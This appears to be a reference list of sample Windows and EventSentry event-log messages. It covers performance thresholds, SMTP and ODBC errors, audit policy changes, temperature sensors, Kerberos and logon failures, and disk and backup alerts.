The group alert "Performance Warning" was triggered because all performance counters of this group reported an alert the last time they were checked. Please see below for a list of all performance counters and the data last reported:
Low Memory: 120 (17 seconds ago)
High Paging Activity: 250 (0 seconds ago)


Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
One or more required function entry points could not be found in the dynamic link library PDH.DLL. Please make sure that the latest version of PDH.DLL is installed on this machine, for example you may copy the DLL from another machine running a later Operating System. Performance monitoring cannot continue.


Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
The performance counter %1 is back above the threshold of %2, the current average is %3.


Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
The performance counter "%1" (instance "%2") is back above the threshold of %3, the current average is %4.


Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
The performance counter "%1" is back below the threshold of %2, the current average is %3.


Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
The performance counter "Process(*)\% Processor Time" (instance "mysqld-nt") is back below the threshold of 50, the current average is 48.


Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
The performance counter "Process(*)\% Processor Time" (instance "SWEEPSRV.SYS") which previously exceeded the configured threshold, is not available anymore and will not be monitored.


Event ID:
Source:
EventSentry
Category:
TestCategory
Message:
Congratulations! You have just installed and setup up EventSentry (on host BLACKMAMBA), which we believe to be the most efficient and economic event log and system monitoring application on the market.
Please visit http://www.eventsentry.com or http://www.netikus.net/ for more information on EventSentry.
Thank you for using EventSentry.


Event ID:
Source:
EventSentry
Message:
Unable to connect to SMTP host %1 due to error "%2". If you are running McAfee Anti-Virus then make sure that outgoing SMTP traffic is not blocked from this machine (e.g. "Access Protection") and that no firewall is blocking traffic between this host and the mail server.



Event ID:
Source:
EventSentry
Message:
Error during SMTP communication with SMTP host %1. After sending "%2" the following error occurred: %3



Event ID:
Source:
EventSentry
Message:
Unable to connect to SMTP host %1 due to error %2. Will try backup smtp host %3 now.



Event ID:
Source:
EventSentry
Message:
The process notification (target) %1 successfully executed the process "%2".


Event ID:
Source:
EventSentry
Message:
The process notification (target) Laser Printer was unable to execute the process ""cscript.exe" c:\temp\dosprint\eventprint.vbs "Security" "Audit Success" "Security" "Detailed Tracking" 592 "NETIKUSNET\sang.kim" "BULL" "2/22/2006 1:03:33 PM" " " due to error 2.


Event ID:
Source:
EventSentry
Message:
EventSentry was unable to connect to the ODBC target "Test ODBC" due to error "OdbcExpandError: [28000] [Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'eventsentry_svc'. (18456)". EventSentry will queue events and continue to attempt the delivery of events.


Event ID:
Source:
EventSentry
Message:
The following error occurred while trying to read the "%1" event log: "%2". In most cases the only way to resolve this problem is to save (if possible) and clear the %1 event log. EventSentry will not be able to monitor the %1 event log until this problem is resolved.



Event ID:
Source:
EventSentry
Message:
Unable to start service because the End User License Agreement was not accepted


Event ID:
Source:
Netlogon
Message:
The session setup from the computer WLBS1 failed to authenticate. The name(s) of the account(s) referenced in the security database is WLBS1$. The following error occurred:
Access is denied.


Event ID:
Source:
EventSentry
Message:
The EventSentry agent has successfully changed the buffer size from %1 bytes to %2 bytes after the Operating System returned the following error: "The data area passed to a system call is too small".



Event ID:
Source:
EventSentry
Message:
The state of service %1 was Stopped, requested state is Running. EventSentry successfully changed the service status to Running.


Event ID:
Source:
EventSentry
Message:
The state of service Spooler is Stopped, requested state is Running. EventSentry was not able to change the service status due to the following error: An instance of the service is already running.


Event ID:
Source:
EventSentry
Message:
The process calc.exe is active.


Event ID:
Source:
EventSentry
Message:
Trend analysis has determined unusual high disk usage on drive %1. The average recorded trend on drive %1 was %2 kb, the current trend was %3 kb, an increase of %4%%.

If this trend change is expected (for example, caused by a daily backup routine) then you will see this message two more times before the pattern is recognized. With the recorded trend, disk space will be exhausted in %5 days, with the current trend in %6 days.


Event ID:
Source:
EventSentry
Message:
Event log filter Test exceeded the configured threshold (3 entries / 300 second(s)). 3 events (out of a total of 8) were dropped by this filter. You can review the dropped events in the event log (if the size of the event log is big enough).


Event ID:
Source:
EventSentry
Message:
Event log filter Test has reached the configured threshold (3 entries / 60 second(s)).



Event ID:
Source:
EventSentry
Message:
Event log filter Test has reached the configured threshold (3 entries / 300 second(s)). Events matching this filter will now be processed.



Event ID:
Source:
EventSentry
Message:
Event log filter Threshold has reached or exceeded the configured threshold (1 entries / 60 second(s)). 5 events were processed during the interval.


Event ID:
Source:
EventSentry
Message:
No event matching filter Backup OK has occurred in the event log in the configured time period. According to the schedule, at least one event matching filter Backup OK should have been logged during the last 420 minutes.



Event ID:
Source:
Browser
Message:
The browser was unable to retrieve a list of servers from the browser master \\DC1-W2K3 on the network \Device\NetBT_Tcpip_631A8496-9308-4979-9849-02D1CAB6CF0A. The data is the error code.



Event ID:
Source:
EventSentry
Message:
EventSentry was unable to query the local audit policy settings. A call to query the current audit policy failed with error %1. Please see the EventSentry documentation for troubleshooting advice on this problem.



Event ID:
Source:
EventSentry
Message:
EventSentry has determined that the currently active Audit Policy does not audit "Process Tracking" and EventSentry is NOT configured to activate "Process Tracking". You will either need to activate Process tracking manually by launching "Start -> Programs -> Administrative Tools -> Local Security Settings -> Local Policies -> Audit Policy -> Audit %3 = Audit Success", activate %2 tracking in Active Directory or configure EventSentry to activate "Process Tracking" for you.


Event ID:
Source:
EventSentry
Message:
EventSentry determined that "Process Tracking" is currently not enabled and was unable to activate it. A call to change the current audit policy failed with error %1. Please see the EventSentry documentation for troubleshooting advice on this problem.


Event ID:
Source:
TermDD
Message:
The RDP protocol component X.224 detected an error in the protocol stream and has disconnected the client.


Event ID:
Source:
LSASRV
Message:
The Security System has received an authentication request that could not be decoded. The request has failed.


Event ID:
Source:
Wins
Message:
WINS received a packet that has the wrong format. For example, a label may be More than 63 octets.


Event ID:
Source:
Wins
Message:
The length of the message sent by another WINS indicates a very big message. There may have been corruption of the data. WINS will ignore this message, terminate the connection with the remote WINS, and continue.


Event ID:
Source:
IAS
Message:
A RADIUS message was received from the invalid RADIUS client IP address 192.168.6.60.


Event ID:
Source:
KDC
Message:
The KDC received invalid messages of type changepassword.


Event ID:
Source:
LSASRV
Message:
An anonymous session connected from 192.168.6.60 has attempted to open an LSA policy handle on this machine. The attempt was rejected with STATUS_ACCESS_DENIED to prevent leaking security sensitive information to the anonymous caller.
The application that made this attempt needs to be fixed. Please contact the application vendor. As a temporary workaround, this security measure can be disabled by setting the \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\TurnOffAnonymousBlock DWORD value to 1.
This message will be logged at most once a day.


Event ID:
Source:
EventSentry
Message:
EventSentry determined that "Process Tracking" is enabled and data will be now be collected.


Event ID:
Source:
EventSentry
Message:
EventSentry has successfully changed the Audit Policy and has enabled "Process Tracking". Process data will be now be collected.


Event ID:
Source:
EventSentry
Message:
EventSentry determined that "Process Tracking" is currently enabled and was unable to deactivate it. A call to change the current audit policy failed with error %1. Please see the EventSentry documentation for troubleshooting advice on this problem.


Event ID:
Source:
EventSentry
Message:
Process Tracking has been enabled but the "Log Size" properties of the Security event log are not configured properly. In order for Process Tracking to work reliably it is recommended that you reconfigure the security event log (with "Event Viewer") to "Overwrite events as needed".


Event ID:
Source:
EventSentry
Message:
EventSentry has successfully changed the Audit Policy and has disabled "Process Tracking". Process data will no longer be collected.


Event ID:
Source:
EventSentry
Message:
The configured temperature limit of %1 degrees (%3) has been exceeded, the current temperature is %2 degrees (%3).



Event ID:
Source:
EventSentry
Message:
The configured humidity limit of 60% has been exceeded, the current humidity level is 90%.


Event ID:
Source:
EventSentry
Message:
EventSentry was unable to find a temperature and/or humidity sensor on serial port %1. Please make sure the device is connected properly.



Event ID:
Source:
EventSentry
Message:
The database write interval for environment monitoring is set too small. The interval was automatically adjusted to %1 seconds.



Event ID:
Source:
EventSentry
Message:
Unable to open serial port %1 due to error "%2". Environment monitoring will not continue.



Event ID:
Source:
EventSentry
Message:
The temperature has fallen below the configured limit of %1 degrees (%3). The current temperature is %2 degrees (%3).



Event ID:
Source:
EventSentry
Message:
The humidity level has fallen below the configured limit of %1%. The current humidity level is %2%%.



Event ID:
Source:
EventSentry
Message:
The current temperature has fallen outside the configured range (%1%4 to %2%4). The current temperature is %3 degrees (%4).



Event ID:
Source:
EventSentry
Message:
The current humidity level has fallen outside the configured range (%1%% to %2%%). The current humidity level is %3%%.



Event ID:
Source:
EventSentry
Message:
The temperature (78.96 degrees F) is back in the configured range (60F to 78F)


Event ID:
Source:
EventSentry
Message:
The current humidity level is back in the configured range (10% to 70%). The current humidity level is 15%.


Event ID:
Source:
Security
Message:
Change Password Attempt:
Target Account Name: ingmar
Target Domain: NETIKUS
Target Account ID: NETIKUS\ingmar
Caller User Name: ingmar
Caller Domain: NETIKUS
Caller Logon ID: (0x0,0xA467822)
Privileges: -



Event ID:
Source:
KDC
Message:
The currently selected KDC certificate was once valid, but now is invalid and no suitable replacement was found. Smartcard logon may not function correctly if this problem is not remedied. Have the system administrator check on the state of the domain's public key infrastructure. The chain status is in the error data.


Event ID:
Source:
Kerberos
Message:
The kerberos client received a KRB_AP_ERR_TKT_NYV error from the server TEST-W2K$. This indicates that the ticket used against that server is not yet valid (in relationship to that server time). Contact your system administrator to make sure the client and server times are in sync, and that the KDC in realm TESTGROUND.LOCAL is in sync with the KDC in the client realm.


Event ID:
Source:
Windows Update Agent
Message:
Installation Failure: Windows failed to install the following update with error 0x80070643: Security Update for Flash Player (KB913433).


Event ID:
Source:
DhcpServer
Message:
The DHCP/BINL service on this Small Business Server has encountered another server on this network with IP Address, 10.10.10.1, belonging to the domain: .


Event ID:
Source:
DhcpServer
Message:
The DHCP/BINL service on this computer is shutting down. See the previous event log messages for reasons.


Event ID:
Source:
AutoEnrollment
Message:
Automatic certificate enrollment for local system failed to enroll for one Directory Email Replication certificate (0x80070005). Access is denied.




Event ID:
Source:
Ntfs
Message:
A user hit their quota limit on volume C:.



Event ID:
Source:
Backup Exec
Message:
Backup Exec Alert: Job Failed(Server: 'CWBAPP01') (Job: 'SQL SERVER DAILY - FULL') SQL SERVER DAILY - FULL -- The job failed with the following error: A failure occurred querying the Writer status. For more information, click the following link: http://eventlookup.veritas.com/eventlookup/EventLookup.jhtml


Event ID:
Source:
Perflib
Message:
The timeout waiting for the performance data collection function "ABC" in the "C:\WINNT\system32\perf.dll" Library to finish has expired. There may be a problem with this extensible counter or the service it is collecting data from or the system may have been very busy when this call was attempted.


Event ID:
Source:
Windows Update Agent
Category:
Installation
Message:
Installation Failure: Windows failed to install the following update with error 0x80070003: Security Update for Windows XP (KB873339).


Event ID:
Source:
ESE
Category:
Logging/Recovery
Message:
Information Store (324) First Storage Group: The backup has been stopped because it was halted by the client or the connection with the client failed.


Event ID:
Source:
DCOM
Message:
DCOM got error "The service cannot be started, either because it is disabled or because it has no enabled devices associated with it. " attempting to start the service IISADMIN with arguments "" in order to run the server:
{A9E69610-B80D-11D0-B9B9-00A0C922E750}


Event ID:
Source:
Security
Message:
Type: Success Audit

Description: Windows NT is shutting down.
All logon sessions will be terminated by this shutdown.


Event ID:
Source:
Security
Message:
Type: Success Audit
Windows is starting up


Event ID:
Source:
DCOM
Message:
DCOM was unable to communicate with the computer 192.168.x.xx using any of the configured protocols.


Event ID:
Source:
Userenv
Message:
Windows cannot determine the user or computer name. (The specified user does not exist.). Group Policy processing aborted.


Event ID:
Source:
SQLAgent
Category:
Alert Engine
Message:
Unable to read local eventlog (reason: The data area passed to a system call is too small).


Event ID:
Source:
Security
Message:
Scheduled Task created:
File Name: C:\WINDOWS\Tasks\Calculator.job
Command: C:\WINDOWS\system32\calc.exe
Triggers: At 11:48 AM every day, starting 11/14/2006.
Time: 11/14/2006 11:48:00 AM
Flags: 0x18000C0
Target User: EVENTSENTRY\User1
By:
User: User1
Domain: EVENTSENTRY
Logon ID: (0x0,0x127F30A0)


Event ID:
Source:
VolSnap
Message:
The shadow copies of volume C: were deleted because the shadow copy storage could not grow in time. Consider reducing the IO load on the system or choose a shadow copy storage volume that is not being shadow copied.


Event ID:
Source:
Security
Category:
Logon/Logoff
Message:
Logon Failure:
Reason: An error occurred during logon
User Name: TheUser
Domain: TheDomain
Logon Type: 11
Logon Process: User32
Authentication Package: Negotiate
Workstation Name: WORKSTATION01
Status code: 0xC000005E
Substatus code: 0x0


Event ID:
Source:
Security
Category:
Account Logon
Message:
Authentication Ticket Request:
User Name: computer$
Supplied Realm Name: DOMAIN.LOCAL
User ID: -
Service Name: krbtgt/DOMAIN.LOCAL
Service ID: -
Ticket Options: 0x40810010
Result Code: 0x6
Ticket Encryption Type: -
Pre-Authentication Type: -
Client Address: 192.168.1.122
Certificate Issuer Name:
Certificate Serial Number:
Certificate Thumbprint:


Event ID:
Source:
MRxSmb
Category:
None
Message:
The master browser has received a server announcement from the computer NT29 that believes that it is the master browser for the domain on transport NetBT_Tcpip_{492C50E8-6A5F-48B9-BA. The master browser is stopping or an election is being forced.


Event ID:
Source:
EFS
Message:
EFS does not support encryption over network sessions established using the NTLM protocol.


Event ID:
Source:
POP3SVC
Message:
DS lookup for user USERNAME, connecting from 192.168.1.1, failed with error 0x80040920.


Event ID:
Source:
MSExchangeIS
Category:
General
Message:
The mailbox for /o=First Organization/ou=first administrative group/cn=Recipients/cn=USERNAME has exceeded the maximum mailbox size. This mailbox cannot send or receive messages. Incoming messages to this mailbox are returned to sender. The mailbox owner should be notified about the condition of the mailbox as soon as possible.


Event ID:
Source:
TermServDevices
Message:
Driver Lexmark W812 required for printer !!Shmata!Lexmark W812 is unknown. Contact the administrator to install the driver before you log in again.



Event ID:
Source:
Server ActiveSync
Message:
Unexpected Exchange mailbox Server error: Server: [EXCHANGE.yourdomain.local] User: [youruser@yourdomain.com] HTTP status code: [409]. Verify that the Exchange mailbox Server is working correctly.


Event ID:
Source:
Perflib
Message:
The Open Procedure for service "ASP.NET_2.0.50727" in DLL "C:\WINNT\Microsoft.NET\Framework\v2.0.50727\aspnet_perf.dll" failed. Performance data for this service will not be available. Status code returned is data DWORD 0.



Event ID:
Source:
Application Error
Message:
Faulting application iexplore.exe, version 7.0.5730.11, faulting module flash9b.ocx, version 9.0.28.0, fault address 0x00072826.


Event ID:
Source:
WinVNC4
Message:
Connections: blacklisted: xx.xx.xx.xx


Event ID:
Source:
WinMgmt
Message:
WMI ADAP was unable to retrieve data from the PerfLib subkey: %1, error code: %2


Event ID:
Source:
Print
Message:
Printer %1 was set


Event ID:
Source:
yukonwxp
Message:
Driver has encountered an internal error.


Event ID:
Source:
MsiInstaller
Message:
Product: Microsoft Visual Studio 2005 Premier Partner Edition - ENU -- Error 1718.File C:\WINDOWS\Installer\236249.msp did not pass the digital signature check. For more information about a possible resolution for this problem, see http://go.microsoft.com/fwlink/?LinkId=73863.


Event ID:
Source:
MsiInstaller
Message:
The installation of C:\WINDOWS\Installer\236249.msp is not permitted due to an error in software restriction policy processing. The object cannot be trusted.


Event ID:
Source:
Windows Update Agent
Category:
Installation
Message:
Installation Failure: Windows failed to install the following update with error 0x80070643: Visual Studio 2005 Service Pack 1.


Event ID:
Source:
VSS
Message:
Volume Shadow Copy Service error: Unexpected error calling routine CoCreateInstance. hr = 0x80040154.


Event ID:
Source:
Disk
Message:
The device, \Device\Harddisk0\D, has a bad block.


Event ID:
Source:
Schannel
Message:
The certificate received from the remote server was issued by an untrusted certificate authority. Because of this, none of the data contained in the certificate can be validated. The SSL connection request has failed. The attached data contains the server certificate.


Event ID:
Source:
DNS
Message:
A zone transfer request for the secondary zone somedomain.local was refused by the master DNS server at 1.2.3.4. Check the zone at the master server 1.2.3.4 to verify that zone transfer is enabled to this server. To do so, use the DNS console, and select master server 1.2.3.4 as the applicable server, then in secondary zone somedomain.local Properties, view the settings on the Zone Transfers tab. Based on the settings you choose, make any configuration adjustments there (or possibly in the Name Servers tab) so that a zone transfer can be made to this server.


Event ID:
Source:
MSExchangeIS Mailbox Store
Category:
MTA Connections
Message:
Verify that the Microsoft Exchange MTA service has started. Consecutive ma-open calls are failing with error 3051.


Event ID:
Source:
PlugPlayManager
Category:
System
Message:
The device Root\LEGACY_ERASERUTILDRV10710\0000 disappeared from the system without first being prepared for removal.


Event ID:
Source:
Office Server Search
Category:
Gatherer
Message:
The start address <http://xxx> cannot be crawled.
Context: Application 'ABC', Catalog 'Portal_Content'
Details:
Element not found.
(0x8002802b)



Event ID:
Source:
EventSystem
Category:
Firing Agent
Message:
The COM+ Event System failed to create an instance of the subscriber 58FC39EB-9DBD-4EA7-B7B4-9404CC6ACFAB. StandardCreateInstance returned HRESULT 8000401A.


Event ID:
Source:
MRxSmb
Message:
The redirector failed to determine the connection type.


Event ID:
Source:
Security
Category:
Account Logon
Message:
Type: Failure Audit
Source: Security
Event Category: Account Logon
Event ID: 677
User: NT AUTHORITY\SYSTEM
Description: Service Ticket Request Failed:
User Name: UserName
User Domain: DomainName
Service Name: ServiceName
Ticket Options: 0x40830000
Failure Code: 0xE
Client Address: IPAddress


Event ID:
Source:
DCOM
Category:
None
Message:
Event message 1

Event Type: Error
Event Source: DCOM
Event Category: None
Event ID: 10021
Date: Date
Time: Time
User: N/A
Computer: SMS SERVER
Description:
The launch and activation security descriptor for the COM Server application with CLSID {61738644-F196-11D0-9953-00C04FD919C1}. is invalid. It contains Access Control Entries with permissions that are invalid. The requested action was therefore not performed. This security permission can be corrected using the Component Services administrative tool.


Event message 2

Event Type: Error
Event Source: DCOM
Event Category: None
Event ID: 10016
Date: Date
Time: Time
User: NT AUTHORITY\SYSTEM
Computer: SMSSERVER
Description:
The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID {05D1D5D8-18D1-4B83-85ED-A0F99D53C885} to the user NT AUTHORITY\SYSTEM SID (S-1-5-18). This security permission can be modified using the Component Services administrative tool.




Event ID:
Source:
Microsoft Fax
Category:
Initialization/Termination
Message:
Event Type: Warning
Event Source: Microsoft Fax
Event Category: Initialization/Termination
Event ID: 32026
Date: 16/11/2005
Time: 05:40:54
User: N/A
Computer: HOUSINGXP
Description:
Fax Service failed to initialize any assigned fax devices (virtual or TAPI). No faxes can be sent or received until a fax device is installed.



Event ID:
Source:
SQLAgent$SHAREPOINT
Category:
Alert Engine
Message:
SQLAgent is not allowed to run.


Event ID:
Source:
WinVNC4
Message:
SConnection: AuthFailureException: Authentication failure


Event ID:
Source:
NTDS Replication
Category:
Backup
Message:
This directory partition has not been backed up since at least the following number of days.

Directory partition:
DC=testdcgrnd,DC=local

'Backup latency interval' (days):
90

It is recommended that you take a backup as often as possible to recover from accidental loss of data. However if you haven't taken a backup since at least the 'backup latency interval' number of days, this message will be logged every day until a backup is taken. You can take a backup of any replica that holds this partition.

By default the 'Backup latency interval' is set to half the 'Tombstone Lifetime Interval'. If you want to change the default 'Backup latency interval', you could do so by adding the following registry key.

'Backup latency interval' (days) registry key:
System\CurrentControlSet\Services\NTDS\Parameters\Backup Latency Threshold (days)



Event ID:
Source:
Server Administrator
Category:
Storage Service
Message:
Virtual disk degraded: Virtual Disk 1 (Virtual Disk 1) Controller 0 (PERC 5/i Integrated)


Event ID:
Source:
Server Administrator
Category:
Storage Service
Message:
Physical disk removed: Physical Disk 0:0:0 Controller 0, Connector 0


Event ID:
Source:
Software Installation
Message:
Software Installation encountered an unexpected error while reading from the MSI file \\server\Software\Firefox\Firefox-2.0.0.4-en-US.msi. The error was not serious enough to justify halting the operation. The following error was encountered: The operation completed successfully.


Event ID:
Source:
MSExchangeTransport
Category:
Connection Manager
Message:
Message delivery to the remote domain 'somedomain.com' failed for the following reason: Unable to bind to the destination server in DNS.


Event ID:
Source:
Disk
Message:
The driver detected that the device \Device\Harddisk0\DR0 has its write cache enabled. Data corruption may occur.


Event ID:
Source:
W32Time
Message:
The time service has not been able to synchronize the system time for 49152 seconds because none of the time providers has been able to provide a usable time stamp. The system clock is unsynchronized.

For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.


Event ID:
Source:
Userenv
Message:
Windows cannot obtain the domain controller name for your computer network. (A socket operation was attempted to an unreachable host. ). Group Policy processing aborted.


Event ID:
Source:
MetaFrameEvents
Category:
Printer Management
Message:
An error occured while retrieving client printer properties. Default printer properties will be used instead. Client name: () Printer: (Client/hostname#/printername) Printer driver: (Citrix Universal Printer)


Event ID:
Source:
Security
Category:
Detailed Tracking
Message:
The Windows Firewall has detected an application listening for incoming traffic.

Name: -
Path: C:\WINDOWS\system32\eventsentry_svc.exe
Process identifier: 4840
User account: es_svc
User domain: DMN
Service: Yes
RPC server: No
IP version: IPv4
IP protocol: UDP
Port number: 2594
Allowed: No
User notified: No


Event ID:
Source:
MSExchangeTransport
Message:
Failed in reading Connector's DS Info Process Id: 1100 Process location: C:\WINNT\System32\inetsrv\inetinfo.exe ConnectorDN: CN=External Mail,CN=Connections,CN=First Routing Group,CN=Routing Groups,CN=First Administrative Group,CN=Administrative Groups,CN=APM,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=ad,DC=apm,DC=net,DC=au Hr:80040920 Attribute:[]


Event ID:
Source:
Application Hang
Message:
Fault bucket 431401983.


Event ID:
Source:
Backup Exec
Message:
An error occurred while attempting to log in to the following server: "SERVER04\DMD_SERVER".
SQL error number: "4818".
SQL error message: "Login failed for user 'WSM1\Administrator'.
".



Event ID:
Source:
MetaFrameEvents
Message:
Client printer auto-creation failed. The driver could not be installed. Possible reasons for the failure: The driver is not in the list of drivers on the server. The driver cannot be located. The driver has not been mapped. Client name: (CALPC01445) Printer: (HP LaserJet 1020 (from CALPC01445) in session 33) Printer driver: (HP LaserJet 1020)


Event ID:
Source:
Perflib
Message:
The Open Procedure for service 'ScanMail_Monitor' in DLL 'C:\WINNT\system32\SmxPerf.dll' failed. Performance data for this service will not be available. Status code returned is data DWORD 0.


Event ID:
Source:
NGen
Message:
Event from Fault: NT Log Monitor[0] : Event from NT System Log[TermServDevices] , Event: ID= 1111, Description: Driver SHARP AR-M277 PCL5e required for printer !!YOWOTTSRV007!OttSharpARM27701 is unknown. Contact the administrator to install the driver before you log in again.


Event ID:
Source:
Perflib
Message:
The Open Procedure for service 'AppleTalk' in DLL 'C:\WINNT\system32\atkctrs.dll' failed. Performance data for this service will not be available. Status code returned is data DWORD 0.


Event ID:
Source:
MetaFrameEvents
Message:
Client printer auto-creation failed. The driver could not be installed. Possible reasons for the failure: The driver is not in the list of drivers on the server. The driver cannot be located. The driver has not been mapped. Client name: (YYZCHOSRVxxx) Printer: (CutePDF Writer (from YYZCHOSRVxxx) in session 112) Printer driver: (CutePDF Writer)


Event ID:
Source:
Browser
Message:
The browser service has failed to retrieve the backup list too many times on transport \Device\NetBT_Tcpip_6ADE6448-65A6-49CA-B8F8-686CE64294DC. The backup browser is stopping.


Event ID:
Source:
Domain Time Server
Message:
Another process has changed the clock rate from 156251/156250 to 156252/156250)


Event ID:
Source:
.NET Runtime
Message:
Unable to open shim database version registry key - v2.0.50727.00000



Event ID:
Source:
Userenv
Message:
Windows has detected that Offline Caching is enabled on the Roaming Profile share - to avoid potential profile corruption, Offline Caching must be disabled on shares where roaming user profiles are stored.


Event ID:
Source:
SceCli
Message:
Security policies were propagated with warning. 0x4b8 : An extended error has occurred.

For best results in resolving this event, log on with a non-administrative account and search http://support.microsoft.com for "Troubleshooting Event 1202's".


Event ID:
Source:
Removable Storage Service
Message:
RSM could not load media in drive Drive 0 of library Iomega RRD2.


Event ID:
Source:
Print
Message:
Printer Driver HP Color LaserJet 2605dn_2605dtn PCL 6 for Windows NT x86 Version-3 was added or updated. Files:- UNIDRV.DLL, UNIDRVUI.DLL, HPC260d6.GPD, UNIDRV.HLP, hpzsc053.dtd, hpzst053.dll, hpc260d6.xml, hpc260dc.ini, hpzpp053.dll, hpzui053.dll, hpz6r053.dll, hpcdmc32.dll, hpbcfgre.dll, hpz6m053.gpd, hpzsm053.gpd, HPC260x6.GPD, hpzev053.dll, pclxl.dll, pjl.gpd, p6disp.gpd, pclxl.gpd, HPZHL053.CAB, STDNAMES.GPD, hpzls053.dll, hpzss053.dll, UNIRES.DLL.


Event ID:
Source:
PDEngine
Message:
Unable to move file E:\System Volume Information\20d5a57d-4de1-11dc-a8af-00101815f0e6{3808876b-c176-4e48-b7ae-04046e6cc752} after many attempts. Skipping file.


Event ID:
Source:
USER32
Message:
The process winlogon.exe has initiated the restart of PANTHER for the following reason: No title for this reason could be found
Minor Reason: 0xff
Shutdown Type: shutdown
Comment: The EventSentry agent is performing a shutdown/reboot of this computer.



Event ID:
Source:
Service Control Manager
Message:
The ABC service was unable to log on as DOMAIN\service.account with the currently configured password due to the following error:
Logon failure: unknown user name or bad password.

To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).


Event ID:
Source:
Security
Message:
User Account password set:
Target Account Name: QA
Target Domain: WESTELL
Target Account ID: WESTELL\QA
Caller User Name: JHINT
Caller Domain: WESTELL
Caller Logon ID: (0x0,0x8F1A7AB5)


Event ID:
Source:
DNS
Message:
The DNS server encountered an invalid domain name in a packet from 128.252.19.21. The packet will be rejected. The event data contains the DNS packet.


Event ID:
Source:
Server Administrator
Message:
Controller log file entry: VD 00/0 is now OPTIMAL: Virtual Disk 0 (Virtual Disk 0) Controller 0 (PERC 5/i Integrated)


Event ID:
Source:
Server Administrator
Message:
Redundancy lost: Virtual Disk 0 (Virtual Disk 0) Controller 0 (PERC 5/i Integrated)


Event ID:
Source:
Server Administrator
Message:
Device failed: Physical Disk 1:0:9 Controller 0, Connector 1


Event ID:
Source:
Server Administrator
Message:
Virtual disk degraded: Virtual Disk 0 (Virtual Disk 0) Controller 0 (PERC 5/i Integrated)


Event ID:
Source:
Print
Message:
Document 19, Name Of The Document Would Be Here owned by domainuser was printed on HP LaserJet 2420d via port IP_192.162.2.29. Size in bytes: 0; pages printed: 1


Event ID:
Source:
Print
Message:
The document Name Of The Document Would Be Here owned by domainuser failed to print on printer HP LaserJet 2420d. Data type: NT EMF 1.008. Size of the spool file in bytes: 191336. Number of bytes printed: 0. Total number of pages in the document: 1. Number of pages printed: 0. Client machine: \\192.168.3.251. Win32 error code returned by the print processor: 0. The operation completed successfully.


Event ID:
Source:
W32Time
Message:
The time service has detected that the system time needs to be changed by -2591998 seconds. The time service will not change the system time by more than -54000 seconds. Verify that your time and time zone are correct, and that the time source xxxx.xxxx.xxx (ntp.d|xx.xx.xx.xx:123->xx.xx.xx.xx:123) is working properly.



Event ID:
Source:
MSExchangeIS Mailbox Store
Category:
General
Message:
Exchange store 'First Storage Group\Mailbox Store (SERVER)': The logical size of this database (the logical size equals the physical size of the .edb file and the .stm file minus the logical free space in each) is 16 GB. This database size is approaching the size limit of 18 GB.

If the logical database size exceeds the maximum size limit, it will be dismounted on a regular basis.

For more information, click http://www.microsoft.com/contentredirect.asp.



Event ID:
Source:
NetRAID.Log
Message:
Adapter 0 Channel 0 Target 2: Media Error Count=1, Other Error Count=0


Event ID:
Source:
MSExchangeSA
Message:
OALGen will skip user entry '@ I-Tek GM-TIS Prod TivTalk' in address list '\Global Address List' because the SMTP address '' is invalid. - Default Offline Address List For more information, click http://www.microsoft.com/contentredirect.asp.


Event ID:
Source:
MSSQLSERVER
Message:
Login failed for user 'sa'. The user is not associated with a trusted SQL Server connection. [CLIENT: 202.98.221.121]



Event ID:
Source:
Userenv
Message:
Windows cannot read the history of GPOs from the registry. Continuing Group Policy Processing.


Event ID:
Source:
USER32
Message:
The reason supplied by user SORTRITE\Craig McWilliams for the last unexpected shutdown of this computer is: Other (Unplanned)
Reason Code: 0xa000000
Bug ID:
Bugcheck String:
Comment: Do not know -- Craig.



Event ID:
Source:
MetaFrame
Message:
Auto Client Reconnect attempted but failed due to incorrect cookie data. NOTE: If this error occurs frequently it may indicate an attempt to gain unauthorized access to the system.



Event ID:
Source:
Userenv
Message:
Windows cannot determine the user or computer name. (Access is denied. ). Group Policy processing aborted.



Event ID:
Source:
NetBT
Message:
A duplicate name has been detected on the TCP network. The IP address of the machine that sent the message is in the data. Use nbtstat -n in a command window to see which name is in the Conflict state.


Event ID:
Source:
DCOM
Message:
DCOM got error '58' attempting to start the service StiSvc with arguments '' in order to run the server:A1F4E726-8CF1-11D1-BF92-0060081ED811


Event ID:
Source:
Security
Category:
Account Logon
Message:
Pre-authentication failed:
User Name: WIN2008$
User ID: TESTGROUND\WIN2008$
Service Name: krbtgt/TESTGROUND.LOCAL
Pre-Authentication Type: 0x0
Failure Code: 0x19
Client Address: 192.138.23.31


Event ID:
Source:
NTDS Replication
Message:
This directory partition has not been backed up since at least the following number of days.

Directory partition:
DC=BarrettHospital,DC=local

'Backup latency interval' (days):
30

It is recommended that you take a backup as often as possible to recover from accidental loss of data. However if you haven't taken a backup since at least the 'backup latency interval' number of days, this message will be logged every day until a backup is taken. You can take a backup of any replica that holds this partition.

By default the 'Backup latency interval' is set to half the 'Tombstone Lifetime Interval'. If you want to change the default 'Backup latency interval', you could do so by adding the following registry key.

'Backup latency interval' (days) registry key:
System\CurrentControlSet\Services\NTDS\Parameters\Backup Latency Threshold (days)


Event ID:
Source:
Kerberos
Message:
A Kerberos Error Message was received:
on logon session
Client Time:
Server Time: 13:37:37.0000 12/14/2007 Z
Error Code: 0x34 KRB_ERR_RESPONSE_TOO_BIG
Extended Error:
Client Realm:
Client Name:
Server Realm: KDOMAIN.COM
Server Name: host/kap.kdomain.com
Target Name: host/kap.kdomain.com@KDOMAIN.COM
Error Text:
File: 9
Line: ae0
Error Data is in record data.



Event ID:
Source:
Kerberos
Message:
A Kerberos Error Message was received:
on logon session
Client Time:
Server Time: 13:34:51.0000 12/14/2007 Z
Error Code: 0xd KDC_ERR_BADOPTION
Extended Error: 0xc00000bb KLIN(0)
Client Realm:
Client Name:
Server Realm: KDOMAIN.COM
Server Name: host/kap.kdomain.com
Target Name: host/kap.kdomain.com@KDOMAIN.COM
